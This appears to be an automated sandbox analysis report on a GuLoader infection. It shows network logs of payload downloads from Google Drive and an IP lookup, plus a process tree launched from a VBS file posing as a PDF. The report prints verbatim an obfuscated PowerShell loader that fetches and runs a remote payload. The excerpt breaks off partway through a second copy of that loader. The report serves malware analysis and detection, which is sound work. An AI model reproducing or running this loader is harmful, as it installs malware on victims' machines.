                                                        2024-04-18 09:07:11 UTC | 4748 | IN | HTTP/1.1 200 OK
                                                        X-GUploader-UploadID: ABPtcPrwSa-ghfPagr1Gf4IEYfqrgUHncCYMfC3V364WMkJpm0CSx8k32mGN6l4PDG1UVwiluho
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="Maalstningen.psp"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 447556
                                                        Last-Modified: Tue, 16 Apr 2024 19:10:36 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:11 GMT
                                                        Expires: Thu, 18 Apr 2024 09:07:11 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=mAej5Q==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.9 | 49713 | 142.251.15.139 | 443 | 7228 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 09:07:57 UTC | 216 | OUT | GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-04-18 09:07:57 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:57 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-dFBStIAnVnQwSqLd3y-8_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.9 | 49714 | 142.250.105.132 | 443 | 7228 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 09:07:57 UTC | 258 | OUT | GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-04-18 09:07:58 UTC | 4752 | IN | HTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="cpKIhQ152.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 243776
                                                        Last-Modified: Tue, 16 Apr 2024 19:09:19 GMT
                                                        X-GUploader-UploadID: ABPtcPo_DL-tHyYydKc7EJh91HXwm3cIJErF3obwfUCX9E0PXyA98G35GRbGqpeE1COapDLrEbYUzo1iBg
                                                        Date: Thu, 18 Apr 2024 09:07:58 GMT
                                                        Expires: Thu, 18 Apr 2024 09:07:58 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=I6FX/g==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID:4
                                                        Source IP:192.168.2.9
                                                        Source Port:49715
                                                        Destination IP:104.26.13.205
                                                        Destination Port:443
                                                        PID:7228
                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe

                                                        Timestamp:2024-04-18 09:07:59 UTC
                                                        Bytes transferred:155
                                                        Direction:OUT
                                                        Data:
                                                        GET / HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                        Host: api.ipify.org
                                                        Connection: Keep-Alive

                                                        Timestamp:2024-04-18 09:07:59 UTC
                                                        Bytes transferred:211
                                                        Direction:IN
                                                        Data:
                                                        HTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 09:07:59 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 12
                                                        Connection: close
                                                        Vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 876381fb59271d6a-ATL

                                                        Timestamp:2024-04-18 09:07:59 UTC
                                                        Bytes transferred:12
                                                        Direction:IN
                                                        Data:
                                                        Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                        Data Ascii: 81.181.57.52



                                                        Target ID:1
                                                        Start time:11:06:51
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
                                                        Imagebase:0x7ff74f590000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:11:06:53
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff72d8c0000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:11:07:04
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. 
A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, 
Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
                                                        Imagebase:0x7ff760310000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:11:07:04
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff70f010000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:11:07:08
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
                                                        Imagebase:0x7ff70dfa0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:11:07:15
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
